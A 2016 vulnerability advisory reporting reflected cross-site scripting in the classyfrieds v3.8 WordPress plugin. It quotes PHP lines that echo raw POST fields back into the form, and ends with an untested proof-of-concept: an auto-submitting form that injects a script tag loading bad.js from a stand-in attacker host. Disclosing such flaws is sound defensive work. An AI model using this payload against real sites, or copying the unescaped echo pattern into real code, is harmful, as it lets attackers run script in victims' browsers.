Advisory #: 1325
Title: Reflected XSS in wordpress plugin classyfrieds v3.8
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/classyfrieds
Downloads: 8698
Vendor Notified: 2016-02-09
Export: Json
Vendor Contact: plugins@wordpress.org
Plugin Name: classyfrieds
Vulnerability:
There is a reflected XSS vulnerability in the following php code ./classyfrieds/themefiles/page-classyfried_add_listing.php: 227: <input type="text" name="titel" class="inputy" maxlength="50" required value="<?PHP echo $_POST['titel']; ?>" > 238: <input type="text" name="subtitle" class="inputy" maxlength="50" value="<?PHP echo $_POST['subtitle']; ?>"> 252: <textarea name="omschrijving" class="texty" rows="8" required ><?PHP echo $_POST['omschrijving']; ?></textarea> 539: <input type="text" name="zip" class="inputy" maxlength="50" value="<?PHP echo $_POST['zip']; ?>"> 555: <input type="text" name="versie" class="inputy" maxlength="50" value="<?PHP echo $_POST['versie']; ?>"> 578: <input type="text" name="create_cat" class="inputy" maxlength="49" value="<?PHP echo $_POST['create_cat']; ?>"> 593: <textarea name="installatie" class="texty" rows="6" ><?PHP echo $_POST['installatie']; ?></textarea> 606: <input type="url" name="url" class="inputy" maxlength="50" value="<?PHP echo $_POST['url']; ?>"> 619: <input type="text" name="prijs" size="7" maxlength="7" value="<?PHP echo $_POST['prijs']; ?>"><?PHP echo $cfl[f_prexpl]; ?> 671: <input type="text" name="sleutelwoorden" class="inputy" maxlength="50" value="<?PHP echo $_POST['sleutelwoorden']; ?>" ><?PHP echo $cfl[f_keyexpl]; ?> 684: <input type="text" name="contactname" class="inputy" maxlength="50" value="<?PHP if (!empty($current_user->user_login)) echo $current_user->user_login; else echo $_POST['contactname']; ?>" > 697: <input type="text" name="contactmail" class="inputy" maxlength="50" value="<?PHP if (!empty($current_user->user_email)) echo $current_user->user_email; else echo $_POST['contactmail']; ?>" > The variable titel appears to send unsanitized data back to the users browser via POST request.
CVE-ID: Not Released
File:./classyfrieds/themefiles/page-classyfried_add_listing.php
Exploit Code:
Exploit was derived from appearance of first vulnerable parameter in code, there could be more shown above.
  1. This is an untested autogenerated exploit:
  2. XSS POST exploit modified from http://blog.portswigger.net/2007/03/exploiting-xss-in-post-requests.html
  3. <form name=TheForm action=http://[target]/wp-content/plugins/classyfrieds/themefiles/page-classyfried_add_listing.php method=post> <input type=hidden name=titel value=&quot;&gt;&lt;script&#32;src=http://attacker/bad.js&gt;&lt;/script&gt;> </form> <script> document.TheForm.submit(); </script>